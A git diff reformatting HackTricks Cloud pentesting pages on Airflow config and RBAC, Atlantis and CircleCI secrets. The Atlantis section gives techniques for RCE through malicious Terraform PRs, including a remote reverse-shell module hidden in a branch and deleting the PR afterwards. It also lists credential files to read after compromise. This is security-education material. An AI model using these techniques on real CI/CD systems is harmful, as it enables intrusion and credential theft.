in place to configure who can access to the API: + - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API + - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication + - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** + - `airflow.api.auth.backend.basic_auth`: For **basic authentication** + - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). 
+ - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). + - You can also **create you own authentication** method with python. +- **`google_key_path`:** Path to the **GCP service account key** + +### **\[atlas]** + +- **`password`**: Atlas password +- **`username`**: Atlas username + +### \[celery] + +- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) +- **`result_backend`**: Postgres url which may contain **credentials**. +- **`ssl_cacert`**: Path to the cacert +- **`ssl_cert`**: Path to the cert +- **`ssl_key`**: Path to the key + +### \[core] + +- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. +- **`fernet_key`**: Key to store encrypted variables (symmetric) +- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. +- **`security`**: What security module to use (for example kerberos) + +### \[dask] + +- **`tls_ca`**: Path to ca +- **`tls_cert`**: Part to the cert +- **`tls_key`**: Part to the tls key + +### \[kerberos] + +- **`ccache`**: Path to ccache file +- **`forwardable`**: Enabled by default + +### \[logging] + +- **`google_key_path`**: Path to GCP JSON creds. + +### \[secrets] + +- **`backend`**: Full class name of secrets backend to enable +- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. 
+ +### \[smtp] + +- **`smtp_password`**: SMTP password +- **`smtp_user`**: SMTP user + +### \[webserver] + +- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value +- **`cookie_secure`**: Set **secure flag** on the the session cookie +- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** +- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) +- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) +- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** +- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** +- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible + +### Web Authentication + +By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as + +```bash +AUTH_TYPE = AUTH_DB +``` + +Which means that the **authentication is checked against the database**. However, other configurations are possible like + +```bash +AUTH_TYPE = AUTH_OAUTH +``` + +To leave the **authentication to third party services**. + +However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: + +```bash +AUTH_ROLE_PUBLIC = 'Admin' +``` + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md similarity index 68% rename from pentesting-ci-cd/apache-airflow-security/airflow-rbac.md rename to src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 94580b7b0..09d5d84fa 100644 --- a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md 
@@ -1,29 +1,16 @@ # Airflow RBAC -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## RBAC (From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. -* **`Admin`** users have all possible permissions. -* **`Public`** users (anonymous) don’t have any permissions. -* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -* **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** users have all possible permissions. +- **`Public`** users (anonymous) don’t have any permissions. +- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** +- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** +- **`Op`** users have `User` permissions plus additional op permissions. Note that **admin** users can **create more roles** with more **granular permissions**. 
@@ -33,37 +20,24 @@ Also note that the only default role with **permission to list users and roles i These are the default permissions per default role: -* **Admin** +- **Admin** \[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on 
User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] -* **Op** +- **Op** \[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] -* **User** +- **User** \[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read 
on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] -* **Viewer** +- **Viewer** \[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] -* **Public** +- **Public** \[] -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md similarity index 69% rename from pentesting-ci-cd/atlantis-security.md rename to src/pentesting-ci-cd/atlantis-security.md index a82b0d255..3143cd694 100644 --- a/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md @@ -1,25 +1,12 @@ # Atlantis Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ### Basic Information Atlantis basically helps you to to run terraform from Pull Requests from your git server. -![](<../.gitbook/assets/image (161).png>) +![](<../images/image (161).png>) ### Local Lab @@ -36,9 +23,8 @@ Atlantis basically helps you to to run terraform from Pull Requests from your gi However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ [**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. -{% hint style="warning" %} -In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. -{% endhint %} +> [!WARNING] +> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. #### Webhooks @@ -48,9 +34,8 @@ One way to confirm this would be to **allowlist requests to only come from the I Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. -{% hint style="warning" %} -Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. -{% endhint %} +> [!WARNING] +> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. #### Provider Credentials 
@@ -60,17 +45,16 @@ Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** com It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: -* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. +- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. +- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: + - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") + - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. +- Others create the necessary config files, ex. 
`~/.aws/credentials`, where Atlantis is running. +- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. -{% hint style="warning" %} -The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. -{% endhint %} +> [!WARNING] +> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. #### Web Page @@ -82,8 +66,8 @@ You probably won't find it exposed to the internet, but it looks like by default Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. -* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server +- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) Values are **chosen in this order**: @@ -91,9 +75,8 @@ Values are **chosen in this order**: 2. Environment Variables 3. Config File -{% hint style="warning" %} -Note that in the configuration you might find interesting values such as **tokens and passwords**. -{% endhint %} +> [!WARNING] +> Note that in the configuration you might find interesting values such as **tokens and passwords**. #### Repos Configuration 
@@ -121,36 +104,34 @@ There isn't any option to allow **specifying** these scripts in the **repo `/atl In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** -{% hint style="danger" %} -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} +> [!CAUTION] +> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ +> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> +> ```yaml +> # atlantis.yaml +> +> version: 3 +> projects: +> +> - dir: . 
+> workflow: custom1 +> workflows: +> custom1: +> plan: +> steps: - init - run: my custom plan command +> apply: +> steps: - run: my custom apply command +> ``` **Conftest Policy Checking** Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: -* Denying usage of a list of modules -* Asserting attributes of a resource at creation time -* Catching unintentional resource deletions -* Preventing security risks (ie. exposing secure ports to the public) +- Denying usage of a list of modules +- Asserting attributes of a resource at creation time +- Catching unintentional resource deletions +- Preventing security risks (ie. exposing secure ports to the public) You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). @@ -178,13 +159,13 @@ atlantis apply [options] -- [terraform apply flags] ## -w workspace ## --auto-merge-disabled ## --verbose -## You can also add extra terraform options +## You can also add extra terraform options ``` ### Attacks -{% hint style="warning" %} -If during the exploitation you find this **error**: `Error: Error acquiring the state lock` +> [!WARNING] +> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` You can fix it by running: @@ -192,7 +173,6 @@ You can fix it by running: atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` -{% endhint %} #### Atlantis plan RCE - Config modification in new PR 
@@ -210,7 +190,7 @@ data "external" "example" { You can perform this attack even in a **stealthier way**, by following this suggestions: -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: ```javascript module "not_rev_shell" { @@ -218,10 +198,10 @@ module "not_rev_shell" { } ``` -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. +- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. #### Atlantis plan Secrets Dump 
@@ -239,10 +219,10 @@ If you have write access over a repository you will be able to create a new bran However, you will usually need to bypass some protections: -* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). - * Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - * By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). + - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` + - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ You just need to make sure some payload like the following ones ends in the `main.tf` file: 
@@ -284,28 +264,27 @@ Something you can pass are env variables which might be helpful to bypass some p Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ This possibility was mentioned in a previous section: -{% hint style="danger" %} -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. - -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} +> [!CAUTION] +> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> +> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> +> ```yaml +> # atlantis.yaml +> version: 3 +> projects: +> - dir: . +> workflow: custom1 +> workflows: +> custom1: +> plan: +> steps: +> - init +> - run: my custom plan command +> apply: +> steps: +> - run: my custom apply command +> ``` #### Bypass plan/apply protections 
@@ -313,8 +292,8 @@ If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo ```yaml repos: -- id: /.*/ - apply_requirements: [] + - id: /.*/ + apply_requirements: [] ``` #### PR Hijacking @@ -325,7 +304,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to ** This is the **setting** in Github branch protections: -![](<../.gitbook/assets/image (216).png>) +![](<../images/image (216).png>) #### Webhook Secret 
@@ -335,20 +314,20 @@ If you manage to **steal the webhook secret** used or if there **isn't any webho Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. -* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. +- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. +- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). 
### Post-Exploitation If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: -* `/home/atlantis/.git-credentials` Contains vcs access credentials -* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate -* `/proc/1/environ` Env variables -* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` Contains vcs access credentials +- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file + - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` Env variables +- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) ### Mitigations 
@@ -364,10 +343,10 @@ If you're running on a public repo (which isn't recommended, see above) you shou Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: -* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -* Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` +- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` +- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. 
@@ -403,20 +382,7 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` ### References -* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) -* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) +- [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) +- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md similarity index 59% rename from pentesting-ci-cd/circleci-security.md rename to src/pentesting-ci-cd/circleci-security.md index e92fede51..4d9e161f1 100644 --- a/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md @@ -1,19 +1,6 @@ # CircleCI Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ### Basic Information @@ -42,8 +29,8 @@ You can declare them in clear text inside a **command**: - run: name: "set and echo" command: | - SECRET="A secret" - echo $SECRET + SECRET="A secret" + echo $SECRET ``` You can declare them in clear text inside the **run environment**: @@ -53,18 +40,18 @@ You can declare them in clear text inside the **run environment**: name: "set and echo" command: echo $SECRET environment: - SECRET: A secret + SECRET: A secret ``` You can declare them in clear text inside the **build-job environment**: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret + build-job: + docker: + - image: cimg/base:2020.01 + environment: + SECRET: A secret ``` You can declare them in clear text inside the **environment of a container**: 
@@ -81,24 +68,22 @@ jobs: #### Project Secrets These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ -![](<../.gitbook/assets/image (129).png>) +![](<../images/image (129).png>) -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. -{% endhint %} +> [!CAUTION] +> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. #### Context Secrets These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: -![](<../.gitbook/assets/image (123).png>) +![](<../images/image (123).png>) -{% hint style="success" %} -However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. -{% endhint %} +> [!TIP] +> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ +> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. ### Attacks 
